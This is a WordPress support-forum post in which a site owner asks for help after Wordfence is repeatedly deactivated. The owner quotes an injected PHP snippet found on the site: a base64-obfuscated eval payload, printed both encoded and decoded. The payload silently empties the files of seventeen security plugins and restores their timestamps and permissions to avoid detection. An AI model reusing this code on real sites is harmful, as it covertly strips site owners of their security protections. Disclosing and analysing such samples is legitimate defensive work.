Malware Inject / Plugin disabled
-
Hi!
I’m dealing with a problem on a website. Wordfence plugin suddenly became unaccessible or disabled without any reason. I found this inject inside one of my codes:$s = 'JGRwYXRoID0gaXNzZXQoJF9TRVJWRVJbIkRPTUFJTl9QQVRIIl0pID8gJF9TRVJWRVJbIkRPTUFJTl9QQVRIIl0gOiAkX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdOw0KJGQgPSAkZHBhdGggLiAnL3dwLWNvbnRlbnQvcGx1Z2lucy8nOw0KJGYgPSBhcnJheSgNCiAgICAkZCAuICd3b3JkZmVuY2Uvd29yZGZlbmNlLnBocCcsDQogICAgJGQgLiAnd29yZGZlbmNlL3dhZi9ib290c3RyYXAucGhwJywNCiAgICAkZCAuICdiZXR0ZXItd3Atc2VjdXJpdHkvYmV0dGVyLXdwLXNlY3VyaXR5LnBocCcsDQogICAgJGQgLiAnc3VjdXJpLXNjYW5uZXIvc3VjdXJpLnBocCcsDQogICAgJGQgLiAnd3Atc2VjdXJpdHktYXVkaXQtbG9nL3dwLXNlY3VyaXR5LWF1ZGl0LWxvZy5waHAnLA0KICAgICRkIC4gJ3RvdGFsLXNlY3VyaXR5L3RvdGFsLXNlY3VyaXR5LnBocCcsDQogICAgJGQgLiAnd3AtaGlkZS1zZWN1cml0eS1lbmhhbmNlci93cC1oaWRlLnBocCcsDQogICAgJGQgLiAnYnVsbGV0cHJvb2Ytc2VjdXJpdHkvYnVsbGV0cHJvb2Ytc2VjdXJpdHkucGhwJywNCiAgICAkZCAuICd3cC1zaW1wbGUtZmlyZXdhbGwvaWN3cC13cHNmLnBocCcsDQogICAgJGQgLiAnd3Atc2VjdXJpdHktcG9saWN5L3dwLWNvbnRlbnQtc2VjdXJpdHktcG9saWN5LnBocCcsDQogICAgJGQgLiAnd3AtY2VyYmVyL3dwLWNlcmJlci5waHAnLA0KICAgICRkIC4gJ2RlZmVuZGVyLXNlY3VyaXR5L3dwLWRlZmVuZGVyLnBocCcsDQogICAgJGQgLiAnc2VjdXJpdHktbmluamEvc2VjdXJpdHktbmluamEucGhwJywNCiAgICAkZCAuICdjd2lzLWFudGl2aXJ1cy1tYWx3YXJlLWRldGVjdGVkL2N3aXMtYW50aXZpcnVzLW1hbHdhcmUtZGV0ZWN0ZWQucGhwJywNCiAgICAkZCAuICduaW5qYWZpcmV3YWxsL25pbmphZmlyZXdhbGwucGhwJywNCiAgICAkZCAuICdzZWN1cml0eS1hbnRpdmlydXMtZmlyZXdhbGwvaW5kZXgucGhwJywNCiAgICAkZCAuICduZndwbHVzL2xpYi9maXJld2FsbC5waHAnDQopOw0KDQpmb3JlYWNoICgkZiBhcyAkdykgew0KICAgIGlmIChpc19maWxlKCR3KSAmJiBmaWxlc2l6ZSgkdykgPiAwKSB7DQogICAgICAgICRwZXJtcyA9IHN1YnN0cihzcHJpbnRmKCIlbyIsIGZpbGVwZXJtcygkdykpLCAtNCk7DQoJCSRzdGF0ID0gc3RhdCgkdyk7DQoJCWlmICghaXNfd3JpdGFibGUoJHcpKSBAY2htb2QoJHcsIDA2NDQpOw0KICAgICAgICBmY2xvc2UoZm9wZW4oJHcsICd3JykpOw0KICAgICAgICBAdG91Y2goJHcsICRzdGF0WydtdGltZSddLCAkc3RhdFsnbXRpbWUnXSk7DQoJCUBjaG1vZCgkdywgb2N0ZGVjKCRwZXJtcykpOw0KICAgICAgICBjbGVhcnN0YXRjYWNoZSgpOw0KICAgIH0NCn07DQo'; $d = 'base'. '6'.'4_d' .'eco' .'de';$o = $d($s);eval ( $o );If you decode it, the code is self explanitory:
$dpath = isset($_SERVER["DOMAIN_PATH"]) ? $_SERVER["DOMAIN_PATH"] : $_SERVER["DOCUMENT_ROOT"];
$d = $dpath . '/wp-content/plugins/';
$f = array(
$d . 'wordfence/wordfence.php',
$d . 'wordfence/waf/bootstrap.php',
$d . 'better-wp-security/better-wp-security.php',
$d . 'sucuri-scanner/sucuri.php',
$d . 'wp-security-audit-log/wp-security-audit-log.php',
$d . 'total-security/total-security.php',
$d . 'wp-hide-security-enhancer/wp-hide.php',
$d . 'bulletproof-security/bulletproof-security.php',
$d . 'wp-simple-firewall/icwp-wpsf.php',
$d . 'wp-security-policy/wp-content-security-policy.php',
$d . 'wp-cerber/wp-cerber.php',
$d . 'defender-security/wp-defender.php',
$d . 'security-ninja/security-ninja.php',
$d . 'cwis-antivirus-malware-detected/cwis-antivirus-malware-detected.php',
$d . 'ninjafirewall/ninjafirewall.php',
$d . 'security-antivirus-firewall/index.php',
$d . 'nfwplus/lib/firewall.php'
); foreach ($f as $w) {
if (is_file($w) && filesize($w) > 0) {
$perms = substr(sprintf("%o", fileperms($w)), -4);
$stat = stat($w);
if (!is_writable($w)) @chmod($w, 0644);
fclose(fopen($w, 'w'));
@touch($w, $stat['mtime'], $stat['mtime']);
@chmod($w, octdec($perms));
clearstatcache();
}
};The first code (without the base64 manual decoding) was not found by any of the above listed plugins. Nor by Wordfence.
I thought I cleaned all the site but suddenly I found wordfence deactivated again without any reason. What should I do?
Obviously, I have changed all the passwords/credentials and performed a full scan on the site.
- The topic ‘Malware Inject / Plugin disabled’ is closed to new replies.
